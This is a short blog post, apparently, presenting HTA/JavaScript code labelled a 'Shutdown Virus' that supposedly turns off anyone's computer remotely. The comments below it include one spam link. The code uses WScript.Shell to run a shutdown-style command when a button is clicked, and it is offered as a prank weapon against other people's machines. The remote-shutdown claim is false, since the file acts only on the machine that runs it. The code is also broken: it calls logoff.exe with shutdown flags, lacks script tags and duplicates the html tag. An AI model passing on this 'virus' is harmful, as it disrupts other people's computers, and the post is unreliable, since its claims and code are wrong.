Make Shutdown Virus Script to "Turnoff" any ones computer remotely.

Here is a code to make a javascript application to shutdown any ones PC.

type below code in notepad and save it as "File_Name.hta"

____________________________________________________________________________________________

<html>

<html>

<head>

<title>Application Executer</title>

<HTA:APPLICATION ID="oMyApp"

APPLICATIONNAME="TanShutD Virus By #Tanveer"
BORDER="no"
CAPTION="no"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
SYSMENU="yes"
SCROLL="no"
WINDOWSTATE="normal">



function RunFile()

{

WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("c:/windows/system32/logoff.exe -s -t 00", 1, false);

}



</head>

<body>

<input type="button" value="ShutDown My PC" onclick="RunFile();"/>

<H1>Creator #Tanveer Ali</H1>

</body>

</html>

Comments

  1. Appreciate ur hard work bro

    ReplyDelete
  2. Oi. Tudo bem ? . Agradeço por publicar este conteúdo.
    Ele é incrível. Sempre acompanho seu site, mas nunca postei um comentário.
    Gostaria de compartilhar no meu twitter.
    Obrigado novamente. http://usa-empire.punbb-hosting.com/profile.php?section=personality&id=2167

    ReplyDelete

Post a Comment

Popular Posts